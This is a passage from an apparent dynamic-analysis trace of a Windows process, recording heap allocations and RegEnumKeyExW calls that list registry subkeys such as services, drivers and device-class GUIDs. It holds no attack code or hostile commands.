Size=0x16) returned 0x5256c8 [0085.522] GetProcessHeap () returned 0x510000 [0085.522] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5256e8 [0085.522] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x12, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Power", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.523] lstrlenW (lpString="Power") returned 5 [0085.523] GetProcessHeap () returned 0x510000 [0085.523] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0xc) returned 0x525ea0 [0085.523] GetProcessHeap () returned 0x510000 [0085.523] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525708 [0085.523] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x13, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Primary disk", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.523] lstrlenW (lpString="Primary disk") returned 12 [0085.523] GetProcessHeap () returned 0x510000 [0085.523] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x1a) returned 0x523fa0 [0085.523] GetProcessHeap () returned 0x510000 [0085.523] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525728 [0085.523] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x14, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="ProfSvc", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.523] lstrlenW (lpString="ProfSvc") returned 7 [0085.523] GetProcessHeap () returned 0x510000 [0085.523] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x10) returned 0x525eb8 [0085.523] GetProcessHeap () returned 0x510000 [0085.523] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525748 [0085.523] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x15, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="RpcEptMapper", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.523] lstrlenW (lpString="RpcEptMapper") returned 12 [0085.523] GetProcessHeap () returned 0x510000 [0085.523] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x1a) returned 0x523fc8 [0085.524] GetProcessHeap () returned 0x510000 [0085.524] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525768 [0085.524] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x16, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="RpcSs", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.524] lstrlenW (lpString="RpcSs") returned 5 [0085.524] GetProcessHeap () returned 0x510000 [0085.524] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0xc) returned 0x525ed0 [0085.524] GetProcessHeap () returned 0x510000 [0085.524] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525788 [0085.524] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x17, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="sacsvr", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.524] lstrlenW (lpString="sacsvr") returned 6 [0085.524] GetProcessHeap () returned 0x510000 [0085.524] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0xe) returned 0x525ee8 [0085.524] GetProcessHeap () returned 0x510000 [0085.524] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5257a8 [0085.524] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x18, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SCSI Class", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.524] lstrlenW (lpString="SCSI Class") returned 10 [0085.524] GetProcessHeap () returned 0x510000 [0085.524] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x16) returned 0x5257c8 [0085.524] GetProcessHeap () returned 0x510000 [0085.524] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5257e8 [0085.524] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x19, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="sermouse.sys", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.525] lstrlenW (lpString="sermouse.sys") returned 12 [0085.525] GetProcessHeap () returned 0x510000 [0085.525] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x1a) returned 0x523ff0 [0085.525] GetProcessHeap () returned 0x510000 [0085.525] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525808 [0085.525] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x1a, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SWPRV", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.525] lstrlenW (lpString="SWPRV") returned 5 [0085.525] GetProcessHeap () returned 0x510000 [0085.525] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0xc) returned 0x525f00 [0085.525] GetProcessHeap () returned 0x510000 [0085.525] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525828 [0085.525] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x1b, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System Bus Extender", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.525] lstrlenW (lpString="System Bus Extender") returned 19 [0085.525] GetProcessHeap () returned 0x510000 [0085.525] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x28) returned 0x526270 [0085.525] GetProcessHeap () returned 0x510000 [0085.525] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525848 [0085.525] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x1c, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TabletInputService", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.525] lstrlenW (lpString="TabletInputService") returned 18 [0085.525] GetProcessHeap () returned 0x510000 [0085.525] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x26) returned 0x5262a0 [0085.525] GetProcessHeap () returned 0x510000 [0085.525] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525868 [0085.526] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x1d, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TBS", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.526] lstrlenW (lpString="TBS") returned 3 [0085.526] GetProcessHeap () returned 0x510000 [0085.526] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x8) returned 0x5262d0 [0085.526] GetProcessHeap () returned 0x510000 [0085.526] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525888 [0085.526] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x1e, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TrustedInstaller", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.526] lstrlenW (lpString="TrustedInstaller") returned 16 [0085.526] GetProcessHeap () returned 0x510000 [0085.526] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x22) returned 0x5262e0 [0085.526] GetProcessHeap () returned 0x510000 [0085.526] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5258a8 [0085.526] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x1f, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="VDS", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.526] lstrlenW (lpString="VDS") returned 3 [0085.526] GetProcessHeap () returned 0x510000 [0085.526] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x8) returned 0x526310 [0085.526] GetProcessHeap () returned 0x510000 [0085.526] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5258c8 [0085.527] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x20, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="vga.sys", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.527] lstrlenW (lpString="vga.sys") returned 7 [0085.527] GetProcessHeap () returned 0x510000 [0085.527] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x10) returned 0x525f18 [0085.527] GetProcessHeap () returned 0x510000 [0085.527] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5258e8 [0085.527] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x21, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="vgasave.sys", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.527] lstrlenW (lpString="vgasave.sys") returned 11 [0085.527] GetProcessHeap () returned 0x510000 [0085.527] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x18) returned 0x525908 [0085.527] GetProcessHeap () returned 0x510000 [0085.527] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525928 [0085.527] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x22, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="vmms", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.528] lstrlenW (lpString="vmms") returned 4 [0085.528] GetProcessHeap () returned 0x510000 [0085.528] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0xa) returned 0x525f30 [0085.528] GetProcessHeap () returned 0x510000 [0085.528] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525948 [0085.528] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x23, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="volmgr.sys", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.528] lstrlenW (lpString="volmgr.sys") returned 10 [0085.528] GetProcessHeap () returned 0x510000 [0085.528] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x16) returned 0x525968 [0085.528] GetProcessHeap () returned 0x510000 [0085.528] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525988 [0085.528] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x24, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="volmgrx.sys", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.528] lstrlenW (lpString="volmgrx.sys") returned 11 [0085.528] GetProcessHeap () returned 0x510000 [0085.528] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x18) returned 0x5259a8 [0085.528] GetProcessHeap () returned 0x510000 [0085.528] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5259c8 [0085.528] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x25, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WinDefend", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.529] lstrlenW (lpString="WinDefend") returned 9 [0085.529] GetProcessHeap () returned 0x510000 [0085.529] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5259e8 [0085.529] GetProcessHeap () returned 0x510000 [0085.529] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525a08 [0085.529] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x26, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WinMgmt", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.529] lstrlenW (lpString="WinMgmt") returned 7 [0085.529] GetProcessHeap () returned 0x510000 [0085.529] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x10) returned 0x525f48 [0085.529] GetProcessHeap () returned 0x510000 [0085.529] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525a28 [0085.529] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x27, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WudfPf", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.529] lstrlenW (lpString="WudfPf") returned 6 [0085.529] GetProcessHeap () returned 0x510000 [0085.529] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0xe) returned 0x525f60 [0085.529] GetProcessHeap () returned 0x510000 [0085.529] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525a48 [0085.529] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x28, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WudfRd", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.530] lstrlenW (lpString="WudfRd") returned 6 [0085.530] GetProcessHeap () returned 0x510000 [0085.530] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0xe) returned 0x525f78 [0085.530] GetProcessHeap () returned 0x510000 [0085.530] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525a68 [0085.530] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x29, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WudfSvc", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.530] lstrlenW (lpString="WudfSvc") returned 7 [0085.530] GetProcessHeap () returned 0x510000 [0085.530] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x10) returned 0x525f90 [0085.530] GetProcessHeap () returned 0x510000 [0085.530] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525a88 [0085.530] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x2a, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{36FC9E60-C465-11CF-8056-444553540000}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.530] lstrlenW (lpString="{36FC9E60-C465-11CF-8056-444553540000}") returned 38 [0085.530] GetProcessHeap () returned 0x510000 [0085.530] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x4e) returned 0x526320 [0085.530] GetProcessHeap () returned 0x510000 [0085.531] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525aa8 [0085.531] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x2b, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E965-E325-11CE-BFC1-08002BE10318}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.531] lstrlenW (lpString="{4D36E965-E325-11CE-BFC1-08002BE10318}") returned 38 [0085.531] GetProcessHeap () returned 0x510000 [0085.532] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x4e) returned 0x526378 [0085.532] GetProcessHeap () returned 0x510000 [0085.533] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525ac8 [0085.533] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x2c, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E967-E325-11CE-BFC1-08002BE10318}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.533] lstrlenW (lpString="{4D36E967-E325-11CE-BFC1-08002BE10318}") returned 38 [0085.533] GetProcessHeap () returned 0x510000 [0085.533] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x4e) returned 0x5263d0 [0085.533] GetProcessHeap () returned 0x510000 [0085.533] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525ae8 [0085.533] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x2d, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E969-E325-11CE-BFC1-08002BE10318}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.533] lstrlenW (lpString="{4D36E969-E325-11CE-BFC1-08002BE10318}") returned 38 [0085.533] GetProcessHeap () returned 0x510000 [0085.533] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x4e) returned 0x526428 [0085.533] GetProcessHeap () returned 0x510000 [0085.533] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525b08 [0085.533] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x2e, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E96A-E325-11CE-BFC1-08002BE10318}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.533] lstrlenW (lpString="{4D36E96A-E325-11CE-BFC1-08002BE10318}") returned 38 [0085.533] GetProcessHeap () returned 0x510000 [0085.533] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x4e) returned 0x526480 [0085.534] GetProcessHeap () returned 0x510000 [0085.534] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x525b28 [0085.534] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x2f, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E96B-E325-11CE-BFC1-08002BE10318}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.534] lstrlenW (lpString="{4D36E96B-E325-11CE-BFC1-08002BE10318}") returned 38 [0085.534] GetProcessHeap () returned 0x510000 [0085.534] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x4e) returned 0x5264d8 [0085.534] GetProcessHeap () returned 0x510000 [0085.534] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526548 [0085.534] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x30, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E96F-E325-11CE-BFC1-08002BE10318}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.534] lstrlenW (lpString="{4D36E96F-E325-11CE-BFC1-08002BE10318}") returned 38 [0085.534] GetProcessHeap () returned 0x510000 [0085.534] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x4e) returned 0x526d30 [0085.534] GetProcessHeap () returned 0x510000 [0085.534] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526568 [0085.534] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x31, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E977-E325-11CE-BFC1-08002BE10318}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.534] lstrlenW (lpString="{4D36E977-E325-11CE-BFC1-08002BE10318}") returned 38 [0085.534] GetProcessHeap () returned 0x510000 [0085.534] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x4e) returned 0x526d88 [0085.534] GetProcessHeap () returned 0x510000 [0085.535] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526588 [0085.535] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x32, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E97B-E325-11CE-BFC1-08002BE10318}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.535] lstrlenW (lpString="{4D36E97B-E325-11CE-BFC1-08002BE10318}") returned 38 [0085.535] GetProcessHeap () returned 0x510000 [0085.535] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x4e) returned 0x526de0 [0085.535] GetProcessHeap () returned 0x510000 [0085.535] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5265a8 [0085.535] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x33, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E97D-E325-11CE-BFC1-08002BE10318}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.535] lstrlenW (lpString="{4D36E97D-E325-11CE-BFC1-08002BE10318}") returned 38 [0085.535] GetProcessHeap () returned 0x510000 [0085.535] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x4e) returned 0x526e38 [0085.536] GetProcessHeap () returned 0x510000 [0085.536] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5265c8 [0085.536] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x34, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E980-E325-11CE-BFC1-08002BE10318}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.536] lstrlenW (lpString="{4D36E980-E325-11CE-BFC1-08002BE10318}") returned 38 [0085.536] GetProcessHeap () returned 0x510000 [0085.536] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x4e) returned 0x526e90 [0085.536] GetProcessHeap () returned 0x510000 [0085.536] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5265e8 [0085.536] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x35, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{533C5B84-EC70-11D2-9505-00C04F79DEAF}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.536] lstrlenW (lpString="{533C5B84-EC70-11D2-9505-00C04F79DEAF}") returned 38 [0085.536] GetProcessHeap () returned 0x510000 [0085.536] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x4e) returned 0x526ee8 [0085.536] GetProcessHeap () returned 0x510000 [0085.536] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526608 [0085.536] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x36, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{6BDD1FC1-810F-11D0-BEC7-08002BE2092F}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.536] lstrlenW (lpString="{6BDD1FC1-810F-11D0-BEC7-08002BE2092F}") returned 38 [0085.536] GetProcessHeap () returned 0x510000 [0085.536] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x4e) returned 0x526f40 [0085.537] GetProcessHeap () returned 0x510000 [0085.537] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526628 [0085.537] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x37, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{71A27CDD-812A-11D0-BEC7-08002BE2092F}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.537] lstrlenW (lpString="{71A27CDD-812A-11D0-BEC7-08002BE2092F}") returned 38 [0085.537] GetProcessHeap () returned 0x510000 [0085.537] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x4e) returned 0x526f98 [0085.537] GetProcessHeap () returned 0x510000 [0085.537] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526648 [0085.537] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x38, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.537] lstrlenW (lpString="{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}") returned 38 [0085.537] GetProcessHeap () returned 0x510000 [0085.537] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x4e) returned 0x526ff0 [0085.537] GetProcessHeap () returned 0x510000 [0085.537] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526668 [0085.537] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x39, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{D48179BE-EC20-11D1-B6B8-00C04FA372A7}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.538] lstrlenW (lpString="{D48179BE-EC20-11D1-B6B8-00C04FA372A7}") returned 38 [0085.538] GetProcessHeap () returned 0x510000 [0085.538] RtlAllocateHeap (HeapHandle=0x510000, 